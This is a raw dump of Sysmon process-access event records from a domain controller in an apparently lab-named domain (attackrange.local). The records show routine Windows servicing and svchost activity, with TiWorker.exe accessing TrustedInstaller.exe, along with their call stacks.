13:58:30.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.851{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+
244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+
244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.836{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+
244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.820{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.805{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM3